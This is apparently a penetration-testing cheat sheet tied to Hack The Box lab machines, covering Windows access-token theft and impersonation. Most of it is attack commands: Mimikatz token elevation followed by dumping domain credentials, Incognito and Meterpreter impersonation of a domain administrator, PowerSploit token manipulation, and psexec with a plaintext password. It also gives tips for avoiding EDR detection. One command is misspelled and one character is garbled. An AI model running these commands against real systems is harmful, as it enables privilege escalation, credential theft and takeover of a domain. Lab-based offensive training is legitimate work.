Token Manipulation

#Overview

Token manipulation involves stealing or duplicating access tokens from privileged processes to escalate privileges or impersonate other users. Windows uses tokens to represent the security context of a process or thread. If you can access a privileged token, you can inherit its permissions — including domain admin.

#Prerequisites

• Low-privileged shell on Windows
• SeDebugPrivilege or ability to open privileged processes
• Mimikatz or Rubeus available

#Detection & Enumeration

# Check current privileges
whoami /priv

# Key privileges for token manipulation:
# SeDebugPrivilege          - Open any process
# SeImpersonatePrivilege    - Impersonate tokens
# SeAssignPrimaryTokenPrivilege - Assign tokens to new processes
# SeIncreaseQuotaPrivilege  - Adjust memory quotas for token assignment

#Exploitation / Execution

#Mimikatz Token Operations

# List all available tokens on the system
mimikatz # token::list

# Elevate to SYSTEM
mimikatz # token::elevate

# Elevate to a specific domain admin (if their token is in a running process)
mimikatz # token::elevate /domain:HTB.LOCAL /user:Administrator

# After elevation, run commands as the elevated user
mimikatz # token::elevate /domain:HTB.LOCAL /user:Administrator
mimikatz # lsadump::dcdomain /domain:HTB.LOCAL /all

#Incognito Token Stealing

# List available tokens
incognito.exe list_tokens -u

# Impersonate a domain admin token
incognito.exe execute -c "HTB\Administrator" cmd.exe

#Named Pipe Impersonation (Metasploit)

# Metasploit getsystem via named pipe impersonation
meterpreter > getsystem -t 1

# This creates a named pipe and tricks a privileged process into connecting,
# then impersonates its token

#Manual Token Theft via PowerShell

# Find processes running as privileged users
Get-Process | Where-Object {$_.ProcessName -match "lsass"} | Select-Object Id, ProcessName

# Using Invoke-TokenManipulation (PowerSploit)
Import-Module .\Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -ShowAll    # List all tokens
Invoke-TokenManipation -ImpersonateUser -Username "HTB\Administrator"

#Parent PID Spoofing for Token Inheritance

# Create a process that inherits the token of a privileged parent
# Using psexec-style token inheritance
impacket-psexec 'HTB.LOCAL/Administrator:Password123@10.10.10.10' -c cmd.exe

#Common Pitfalls

• ⚠️ Token impersonation only works within the current session — if you start a new process, it may revert to your original context unless you use CreateProcessWithTokenW
• ⚠️ SeImpersonatePrivilege is common for service accounts (IIS, SQL) but only allows impersonation of tokens at Impersonation level, not Identification level
• ⚠️ Some tokens cannot be impersonated across session boundaries — a token from session 0 may not work in session 1
• �️️ SeDebugPrivilege may need to be enabled before use: privilege::debug in Mimikatz

#OPSEC Considerations

• 🛡️ Token manipulation generates Windows Event ID 4624 (logon) entries with the impersonated user
• 🛡️ Mimikatz token::elevate is detected by most EDR products
• 🛡️ Process creation with stolen tokens generates Event ID 4688
• 🛡️ SeDebugPrivilege usage is logged when opening lsass.exe (Event ID 4663 with Process Access)
• 🛡️ Consider using Rubeus or built-in .NET token manipulation to avoid Mimikatz detection
• 🛡️ Event ID 4672: Special Privileges Assigned to New Logon — fires when SeDebugPrivilege or SeImpersonatePrivilege is used in a new session
• 🛡️ Sysmon Event ID 10: Process Access — fires when any process reads LSASS memory (Lsassy, Mimikatz, procdump)
• 🛡️ Event ID 4688: Process Creation — token manipulation tools create new processes visible to EDR

#Post-Exploitation Value

Token manipulation grants access to any user whose token is available on the system. This is particularly powerful when combined with LSASS memory access — if you find domain admin tokens in memory, you can impersonate them without knowing the password.

#Tool References

#Source Machines

• Multimaster (Hard, Windows)
• Rebound (Insane, Windows/AD)
• StreamIO (Hard, Windows)